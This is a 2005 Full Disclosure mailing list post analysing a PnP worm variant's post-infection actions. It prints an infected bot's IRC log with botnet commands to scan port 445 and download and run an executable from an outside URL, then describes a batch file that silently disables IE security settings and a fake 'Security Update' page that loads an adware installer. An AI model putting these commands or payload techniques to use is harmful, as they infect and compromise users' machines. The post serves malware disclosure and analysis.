Full Disclosure mailing list archives
pnp worm unknown variant - post infection actions
From: "Morning Wood" <se_cur_ity () hotmail com>
Date: Tue, 16 Aug 2005 16:03:32 -0700
pnp worm unknown variant - post infection actions Donnie Werner http://exploitlabs.com [ relevant info ] [08/16/2005] (out) NICK [00|USA|618452] [08/16/2005] (out) USER 2K-7566 * 0 :INFECTEDUSER [08/16/2005] (in) :hub.de NOTICE [00|USA|618452] :*** If you are having problems connecting due to ping timeouts, please type /quote pong 5DCA1942 or /raw pong 5DCA1942 now. [08/16/2005] (in) PING :5DCA1942 [08/16/2005] (out) PONG 5DCA1942 [08/16/2005] (in) :hub.de 001 [00|USA|618452] :Welcome to the hub IRC Network [00|USA|618452]!2K-7566 () 71 xx xx.49 [08/16/2005] (in) :hub.de 004 [00|USA|618452] hub.de Unreal3.2.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeKVfMGCuzNT [08/16/2005] (out) MODE [00|USA|618452] [08/16/2005] (out) JOIN #upnp [08/16/2005] (in) :hub.de 332 [00|USA|618452] #upnp :.asc -S -s|.else status scan .asc PnP445 120 5 0 _a _r _e _s|.if nick *USA* .r JOIN #usa [08/16/2005] (out) JOIN #usa [08/16/2005] (out) PRIVMSG #upnp :IRC// Sent IRC raw: "JOIN #usa". [08/16/2005] (in) :[00|USA|618452]!2K-7566 () 71 xx xx.49 JOIN :#usa [08/16/2005] (in) :hub.de 332 [00|USA|618452] #usa :.down http://www.dreamcatcherprod.com/gc.exe C:\u487sdjkt.exe 1 -s|.r JOIN #rr [08/16/2005] (out) JOIN #rr [ gc.exe ] gc.exe is a selfextracting archive that expands to.. 02/08/2005 05:33 AM 3,496 kans.reg 01/31/2005 06:57 AM 3,276 kansup.reg 07/31/2005 11:06 PM 378 update.html 07/15/2005 05:36 AM 95 x.bat the .bat runs.. ---------- REGEDIT.EXE /S kans.reg update.html SLEEP 5 del kans.reg del x.bat ---------- the .reg files disable IE Security settings update.html contains... ---------- [TITLE]Security Update[/TITLE] [HEAD][/HEAD] [BODY] [script language='JavaScript' type='text/JavaScript' src='http://install.xxxtoolbar.com/ist/scripts/prompt.php?retry=2&loadfirst= 1&delayload=0&account_id=159900&recurrence=always&adid=a1117836900&event_typ e=onload&signature=159900'][/script] [script language="JavaScript"]self.focus();[/script] ---------- which installs pornographic malware. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- pnp worm unknown variant - post infection actions Morning Wood (Aug 16)
- Re: pnp worm unknown variant - post infection actions Jason Coombs (Aug 16)